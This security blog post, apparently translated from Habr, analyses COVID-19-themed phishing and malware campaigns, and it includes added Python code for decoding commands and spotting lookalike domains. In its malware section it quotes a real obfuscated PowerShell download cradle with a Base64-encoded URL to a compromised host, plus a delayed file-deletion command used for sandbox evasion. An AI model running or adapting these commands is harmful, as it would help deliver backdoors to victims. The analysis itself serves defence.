Coronavirus cyberattacks: the whole point is social engineering

Attackers continue to exploit the COVID-19 theme, creating more and more threats for users who are keenly interested in everything related to the pandemic. In the previous post we already talked about which kinds of malware appeared in the wake of the coronavirus, and today we will talk about the social engineering techniques that users in different countries, including Russia, have already encountered. General trends and examples are under the cut.

Remember that last time we talked about the fact that people want to read not only about the coronavirus and the course of the epidemic, but also about financial support measures? Here is a good example. An interesting phishing attack was discovered in the German state of North Rhine-Westphalia, or NRW. The attackers created copies of the website of the Ministry of Economy (NRW Ministry of Economic Affairs), where anyone can apply for financial assistance. Such a program really exists, and it turned out to be useful to the scammers. After receiving the personal data of their victims, they submitted an application on the real ministry website, but indicated other bank details. According to official data, 4 thousand such fake applications were made before the scheme was discovered. As a result, $4 million intended for affected citizens fell into the hands of the fraudsters.

Would you like a free COVID-19 test?

Another notable example of coronavirus-themed phishing was found in emails. The messages attracted users' attention with an offer of free coronavirus testing. The attachments to these emails contained samples of Trickbot/Qakbot/Qbot. And when those who wanted to check their health started to "fill out the attached form", a malicious script was downloaded to the computer. To evade sandbox analysis, the script started downloading the main malware only after some time, when the protection systems were convinced that nothing malicious was going to happen.

Convincing most users to enable macros was also easy. A standard trick was used for this: to fill out the questionnaire, you first need to enable macros, which means you need to run a VBA script.

As you can see, the VBA script is heavily masked from antivirus products.

Windows has a wait feature in which an application waits /T <seconds> before accepting the default "Yes" answer. In our case, the script waited 65 seconds before deleting the temporary files:

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt

And during the wait, the malware was downloaded. A special PowerShell script was launched for this:

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt

After decoding the Base64 values, the PowerShell script downloads the backdoor located on a previously compromised web server from Germany:

http://automatischer-staubsauger.com/feature/777777.png

and saves it under the name:

C:\Users\Public\tmpdir\file1.exe

The folder 'C:\Users\Public\tmpdir' is deleted when running the 'tmps1.bat' file, which contains the command cmd /c mkdir ""C:\Users\Public\tmpdir"".
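For triage of process-creation logs, the two command lines quoted above can be unpacked automatically. The following is an added example, not code from the original post: it decodes the Base64 arguments, folds the split string literals and reports the `choice /T` delay; the function names `deobfuscate` and `triage` are hypothetical.

```python
import base64
import re

# Command lines as quoted on this page (backslashes restored), used as log input.
DELAY_CMD = (r"cmd.exe /C choice /C Y /N /D Y /T 65 & Del "
             r"C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt")
DOWNLOAD_CMD = (
    "cmd /C powershell -Command \"\"(New-Object Net.WebClient).DownloadFile("
    "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    "'aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), "
    "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("
    "'QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')"
)

B64_CALL = re.compile(
    r"\[System\.Text\.Encoding\]::ASCII\.GetString\(\s*\[System\.Convert\]::"
    r"FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)", re.I)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
CHOICE_DELAY = re.compile(r"\bchoice\b.*?/T\s+(\d+)", re.I)

def deobfuscate(cmdline):
    """Replace Base64 decode calls with quoted literals, then fold 'a' + 'b'."""
    def decode(m):
        return "'" + base64.b64decode(m.group(1)).decode("ascii", "replace") + "'"
    text = B64_CALL.sub(decode, cmdline)
    while True:
        # Fold one concatenation per pass until nothing changes
        folded = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text, count=1)
        if folded == text:
            return text
        text = folded

def triage(cmdline):
    """Summarise what an analyst needs: delay, download call, clear-text literals."""
    clear = deobfuscate(cmdline)
    delay = CHOICE_DELAY.search(cmdline)
    return {
        "delay_seconds": int(delay.group(1)) if delay else None,
        "downloads": "DownloadFile" in clear,
        "literals": re.findall(r"'([^']+)'", clear),
    }
```

Running `triage` over both samples yields the 65-second delay for the first and the source URL plus the final `file1.exe` drop path for the second, which is the pair of values worth pivoting on in proxy and EDR logs.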

Targeted attacks on government organizations

In addition, FireEye analysts recently reported a targeted APT32 attack aimed at government structures in Wuhan, as well as at the Chinese Ministry of Emergency Management. One of the distributed RTF files contained a link to a New York Times article titled Coronavirus Live Updates: China is Tracking Travelers From Hubei. However, when it was read, malware was downloaded (FireEye analysts identified the sample as METALJACK).

Interestingly, at the time of discovery, none of the antivirus products detected this sample, according to Virustotal.

When official websites are down

A striking example of a phishing attack occurred in Russia the other day. The occasion was the introduction of a long-awaited benefit for children aged 3 to 16. When the start of accepting applications was announced on May 3, 16, millions rushed to the Government Services website for the long-awaited help and brought the portal down no worse than a professional DDoS attack. When the president said that "Government Services cannot cope with the flow of applications," people started talking online about the launch of an alternative site for accepting applications.

The problem is that several sites started working at once, and while one, the real one at posobie16.gosuslugi.ru, accepts applications, many others collect the personal data of gullible users.

Colleagues from SearchInform found about 30 fraudulent sites in the .ru zone. Infosecurity and Softline Company have tracked more than 70 fake government services websites since the beginning of April. Their creators manipulate familiar symbols and also use combinations of the words gosuslugi, gosuslugi-30, vyplaty, covid-vyplaty, posobie, and so on.
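A mail or proxy filter can apply the same observation in reverse: a host that carries these keywords but does not sit under the official zone deserves a closer look. This is an added example, not from the original post; the sample hosts under `.example` are constructed and the function names are hypothetical.

```python
from urllib.parse import urlsplit

OFFICIAL_ZONE = "gosuslugi.ru"
# Keywords listed on this page; "covid-vyplaty" is covered by "vyplaty".
KEYWORDS = ("gosuslugi", "vyplaty", "posobie")

def hostname(value):
    """Accept a bare host or a full URL and return the lower-cased host name."""
    value = value.strip()
    host = urlsplit(value if "//" in value else "//" + value).hostname or ""
    return host.rstrip(".").lower()

def classify(value):
    """Return (verdict, matched keywords) for one host or URL."""
    host = hostname(value)
    # Match on a label boundary: the zone itself or a true subdomain of it.
    # A plain substring or prefix test would accept gosuslugi.ru.<anything>.
    if host == OFFICIAL_ZONE or host.endswith("." + OFFICIAL_ZONE):
        return "official", []
    hits = [k for k in KEYWORDS if k in host]
    return ("lookalike", hits) if hits else ("unrelated", [])

def lookalikes(values):
    """Filter a list of hosts or URLs down to the suspicious ones."""
    return [v for v in values if classify(v)[0] == "lookalike"]

# Constructed sample input (only the first entry appears on this page).
SAMPLES = [
    "posobie16.gosuslugi.ru",
    "gosuslugi-30.example",
    "https://gosuslugi.ru.covid-vyplaty.example/form",
    "news.example",
]
```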

Hype and social engineering

All these examples only confirm that attackers are successfully monetizing the coronavirus topic. And the higher the social tension and the more unclear issues there are, the more chances scammers have to steal important data, force people to hand over their money themselves, or simply compromise more computers.

And given that the pandemic has forced potentially unprepared people to work from home en masse, not only personal but also corporate data is at risk. For example, Microsoft 365 (formerly Office 365) users were also recently subjected to a phishing attack. People received "missed" voice messages as attachments to emails. However, the files were actually an HTML page that sent the victims of the attack to a fake Microsoft 365 sign-in page. The result: loss of access and compromise of all data from the account.

Source: www.habr.com